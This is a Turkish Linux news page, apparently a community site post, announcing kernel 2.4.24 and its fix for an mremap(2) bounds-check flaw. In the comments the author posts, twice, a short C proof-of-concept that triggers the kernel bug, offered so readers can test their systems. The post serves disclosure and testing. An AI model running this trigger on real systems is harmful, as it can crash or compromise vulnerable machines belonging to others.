Kernel 2.4.24 Çıktı

0
bahadirkandemir
bahadirkandemir
6 Ocak 2004 , 1 dakika okuma süresi
Kernel'in bellek yönetim kodunda, mremap(2) sistem çağrısındaki hatalı sınır kontrolünden kaynaklanan bir güvenlik zayıflığı bulundu.

mremap sistem çağrısı, sanal bellek alanlarının adreslenebilir boşluklarını taşımak ve boyutlarını değiştirme imkanı sağlıyor.

Duyurunun tamamı: http://isec.pl/vulnerabilities/isec-0013-mremap.txt
linux
3
Linkedin Facebook Twitter Google plus

Görüşler

bahadirkandemir
0
bahadirkandemir
NOT: Bu zayıflığın 2.2, 2.4 ver 2.6 serilerinde olduğu belirtilmişti ancak, zayıflığı keşfeden güvenlik grubu bu açığın MREMAP_FIXED bayrağını desteklemeyen 2.2 serilerinde olmadığını önemli güvenlik listelerinde duyurdu.

Kernel 2.6.0'da aynı zayıflığın olduğu duyurulmuştu, 2.6.1-rc1'de zayıflığın giderilmediği, 2.6.1-rc2'de giderildiği ek bir açıklama ile duyuruldu.

Zayıflığı test etmek isteyenler aşağıdaki kodu deneyebilir:

#include
#include
#include
#include

#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2

#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
size_t, old_size, size_t, new_size,
unsigned long, flags, void *, new_address );

int main( void )
{
void *base;

base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
(void *) 0xC0000000 );

fork();

return( 0 );
}
realist
0
realist
ne #include ediyoruz?
hangi #include ?
bahadirkandemir
0
bahadirkandemir
Sanırım < ve > karakterleri sorun yarattı. 2 kere önizleme yapmamdan kaynaklandı.

----------------------------------------------

#include <asm/unistd.h>
#include <sys/mman.h>
#include <unistd.h>
#include <errno.h>

#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2

#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
size_t, old_size, size_t, new_size,
unsigned long, flags, void *, new_address );

int main( void )
{
void *base;

base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
(void *) 0xC0000000 );

fork();

return( 0 );
}
Görüş belirtmek için giriş yapın...

İlgili Yazılar

E-Lapis Dergisi Çıktı (Sayı 1)
anonim
4 Nisan 2005, 1 dakika okuma süresi

Gönüllü olarak hayata geçirmeye çalıştığımız projelerden birisi olan e-lapis online derginin ilk sayısı çıktı. PDF formatında indirilebilir.

Lockheed Martin´den Linux projesi
urxalit
21 Kasım 2001, 1 dakika okuma süresi

Newsalert´teki habere göre Lockheed Martin tasarım projelerinde Linux kullanmaya başlıyor. Haberin devamı için buraya tıklayabilirsiniz.

College Linux 2.3 İncelemesi
anonim
12 Temmuz 2003, 1 dakika okuma süresi

LinuxTurkey.org College Linux u masaüstü kullanımı açısından incelemiş:

College Linux 2.3 Darth Vader (evet sürüm ismi olarak Star Wars karakter isimleri kullanıyor, bir sonraki sürüm ise Obi Van adını taşıyor) aslen İsviçre'deki Robert Kenedy College öğrencileri ve genel olarak üniversite öğrenci popülasyonuna hitab eden bir dağıtım. Dağıtım Linux dünyasının en sert ve en Unixvari dağıtımı olan Slackware üzerine kurulmuş.

Mini Linux Makinalar
sundance
6 Ağustos 2001, 1 dakika okuma süresi

Linux`la Turkiye çapında iş mi yapmak istiyorsunuz ? Minimum müdahale ile çalışan verimli, aynı zamanda da estetik Linux istemciler mi arıyorsunuz ? Daha fazla aramayın...

Linuxdevices.com sizin için oldukça iyi bir liste hazırlamış durumda. Her türlü isteğe, ihtiyaca göre mini mini linux makinalar, seçin beğenin alın :)

Linux Counter: Hala sayılmadınız mı???
conan
2 Ekim 2001, 1 dakika okuma süresi

Off! Çok zaman olmuş birşeyler yazmayalı! Neden bu kadar tembelleştim acaba? :P Neyse şu tembelliğime "Linux Counter" sitesi konusunda birşeyler yazarak son vermeyi deneyeyim! :)

Linux Counter adından da anlaşılacağı üzere dünya üzerinde linux kullanıcılarını ve linux kullanan bilgisayarları saymayı amaç edinmiş bir site.